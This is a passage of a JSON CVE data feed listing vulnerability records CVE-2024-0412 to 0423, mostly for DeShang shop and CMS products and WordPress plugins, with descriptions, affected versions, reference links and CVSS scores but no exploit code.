"NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-11T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0412", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/Q56cf5nN9RzF", "name" : "https://note.zhaoj.in/share/Q56cf5nN9RzF", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/Q56cf5nN9RzF", "name" : "https://note.zhaoj.in/share/Q56cf5nN9RzF", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250432", "name" : "https://vuldb.com/?ctiid.250432", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250432", "name" : "https://vuldb.com/?ctiid.250432", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250432", "name" : "https://vuldb.com/?id.250432", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250432", "name" : "https://vuldb.com/?id.250432", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in DeShang DSShop up to 3.1.0. It has been declared as problematic. This vulnerability affects unknown code of the file public/install.php of the component HTTP GET Request Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250432." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dsshop:3.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dsshop:3.1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-11T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0413", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/MarH4fY66BgO", "name" : "https://note.zhaoj.in/share/MarH4fY66BgO", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/MarH4fY66BgO", "name" : "https://note.zhaoj.in/share/MarH4fY66BgO", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250433", "name" : "https://vuldb.com/?ctiid.250433", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250433", "name" : "https://vuldb.com/?ctiid.250433", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250433", "name" : "https://vuldb.com/?id.250433", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250433", "name" : "https://vuldb.com/?id.250433", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in DeShang DSKMS up to 3.1.2. It has been rated as problematic. This issue affects some unknown processing of the file public/install.php. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250433 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dskms:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.1.0", "versionEndIncluding" : "3.1.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-11T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0414", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/xYQMsARg83ui", "name" : "https://note.zhaoj.in/share/xYQMsARg83ui", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/xYQMsARg83ui", "name" : "https://note.zhaoj.in/share/xYQMsARg83ui", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250434", "name" : "https://vuldb.com/?ctiid.250434", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250434", "name" : "https://vuldb.com/?ctiid.250434", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250434", "name" : "https://vuldb.com/?id.250434", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250434", "name" : "https://vuldb.com/?id.250434", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in DeShang DSCMS up to 3.1.2/7.1. Affected is an unknown function of the file public/install.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250434 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dscms:7.1:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dscms:7.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dscms:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.1.0", "versionEndIncluding" : "3.1.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-11T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0415", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/63LhFitJmKGR", "name" : "https://note.zhaoj.in/share/63LhFitJmKGR", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/63LhFitJmKGR", "name" : "https://note.zhaoj.in/share/63LhFitJmKGR", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250435", "name" : "https://vuldb.com/?ctiid.250435", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250435", "name" : "https://vuldb.com/?ctiid.250435", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250435", "name" : "https://vuldb.com/?id.250435", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250435", "name" : "https://vuldb.com/?id.250435", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in DeShang DSMall up to 6.1.0. Affected by this vulnerability is an unknown functionality of the file application/home/controller/TaobaoExport.php of the component Image URL Handler. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250435." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dsmall:*:*:*:*:*:*:*:*", "versionEndIncluding" : "6.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-11T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0416", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/DxR7FZsCKJQ1", "name" : "https://note.zhaoj.in/share/DxR7FZsCKJQ1", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/DxR7FZsCKJQ1", "name" : "https://note.zhaoj.in/share/DxR7FZsCKJQ1", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250436", "name" : "https://vuldb.com/?ctiid.250436", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250436", "name" : "https://vuldb.com/?ctiid.250436", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250436", "name" : "https://vuldb.com/?id.250436", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250436", "name" : "https://vuldb.com/?id.250436", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in DeShang DSMall up to 5.0.3. Affected by this issue is some unknown functionality of the file application/home/controller/MemberAuth.php. The manipulation of the argument file_name leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250436." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dsmall:*:*:*:*:*:*:*:*", "versionEndIncluding" : "5.0.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-11T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0417", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/ZpRTCLblKd7N", "name" : "https://note.zhaoj.in/share/ZpRTCLblKd7N", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://note.zhaoj.in/share/ZpRTCLblKd7N", "name" : "https://note.zhaoj.in/share/ZpRTCLblKd7N", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250437", "name" : "https://vuldb.com/?ctiid.250437", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250437", "name" : "https://vuldb.com/?ctiid.250437", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250437", "name" : "https://vuldb.com/?id.250437", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250437", "name" : "https://vuldb.com/?id.250437", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in DeShang DSShop up to 2.1.5. This affects an unknown part of the file application/home/controller/MemberAuth.php. The manipulation of the argument member_info leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250437 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dsshop:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.1.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-11T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0418", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cxsecurity.com/issue/WLB-2024010023", "name" : "https://cxsecurity.com/issue/WLB-2024010023", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://cxsecurity.com/issue/WLB-2024010023", "name" : "https://cxsecurity.com/issue/WLB-2024010023", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250438", "name" : "https://vuldb.com/?ctiid.250438", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250438", "name" : "https://vuldb.com/?ctiid.250438", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250438", "name" : "https://vuldb.com/?id.250438", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250438", "name" : "https://vuldb.com/?id.250438", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.youtube.com/watch?v=WK7xK9KHiMU", "name" : "https://www.youtube.com/watch?v=WK7xK9KHiMU", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=WK7xK9KHiMU", "name" : "https://www.youtube.com/watch?v=WK7xK9KHiMU", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in iSharer and upRedSun File Sharing Wizard up to 1.5.0 and classified as problematic. This vulnerability affects unknown code of the component GET Request Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250438 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:upredsun:file_sharing_wizard:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.5.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-11T18:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0419", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cxsecurity.com/issue/WLB-2024010027", "name" : "https://cxsecurity.com/issue/WLB-2024010027", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://cxsecurity.com/issue/WLB-2024010027", "name" : "https://cxsecurity.com/issue/WLB-2024010027", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250439", "name" : "https://vuldb.com/?ctiid.250439", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250439", "name" : "https://vuldb.com/?ctiid.250439", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250439", "name" : "https://vuldb.com/?id.250439", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250439", "name" : "https://vuldb.com/?id.250439", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=6dAWGH0-6TY", "name" : "https://www.youtube.com/watch?v=6dAWGH0-6TY", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://www.youtube.com/watch?v=6dAWGH0-6TY", "name" : "https://www.youtube.com/watch?v=6dAWGH0-6TY", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Jasper httpdx up to 1.5.4 and classified as problematic. This issue affects some unknown processing of the component HTTP POST Request Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250439." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:httpdx_project:httpdx:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.5.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-11T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0420", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/b6187ef8-70f4-4911-abd7-42bf6b7e54b7/", "name" : "https://wpscan.com/vulnerability/b6187ef8-70f4-4911-abd7-42bf6b7e54b7/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/b6187ef8-70f4-4911-abd7-42bf6b7e54b7/", "name" : "https://wpscan.com/vulnerability/b6187ef8-70f4-4911-abd7-42bf6b7e54b7/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The MapPress Maps for WordPress plugin before 2.88.15 does not sanitize and escape the map title when outputting it back in the admin dashboard, allowing Contributors and above roles to perform Stored Cross-Site Scripting attacks" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mappresspro:mappress_maps_for_wordpress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.88.15", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-12T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0421", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-639" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/587acc47-1966-4baf-a380-6aa479a97c82/", "name" : "https://wpscan.com/vulnerability/587acc47-1966-4baf-a380-6aa479a97c82/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/587acc47-1966-4baf-a380-6aa479a97c82/", "name" : "https://wpscan.com/vulnerability/587acc47-1966-4baf-a380-6aa479a97c82/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The MapPress Maps for WordPress plugin before 2.88.16 is affected by an IDOR as it does not ensure that posts to be retrieve via an AJAX action is a public map, allowing unauthenticated users to read arbitrary private and draft posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mappresspro:mappress_maps_for_wordpress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.88.16", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-12T16:15Z", "lastModifiedDate" : "2025-05-07T21:16Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0422", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1_CoeXcCC8fXzKJO-Xvjuq1qYtf8QKHaM/view?usp=sharing", "name" : "https://drive.google.com/file/d/1_CoeXcCC8fXzKJO-Xvjuq1qYtf8QKHaM/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/file/d/1_CoeXcCC8fXzKJO-Xvjuq1qYtf8QKHaM/view?usp=sharing", "name" : "https://drive.google.com/file/d/1_CoeXcCC8fXzKJO-Xvjuq1qYtf8QKHaM/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250441", "name" : "https://vuldb.com/?ctiid.250441", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250441", "name" : "https://vuldb.com/?ctiid.250441", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250441", "name" : "https://vuldb.com/?id.250441", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250441", "name" : "https://vuldb.com/?id.250441", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in CodeAstro POS and Inventory Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /new_item of the component New Item Creation Page. The manipulation of the argument new_item leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250441 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codeastro:pos_and_inventory_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-11T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0423", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1SaHrOPMV6yrBaS5pA7MOX8nsiVGxvlOa/view?usp=sharing", "name" : "https://drive.google.com/file/d/1SaHrOPMV6yrBaS5pA7MOX8nsiVGxvlOa/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : 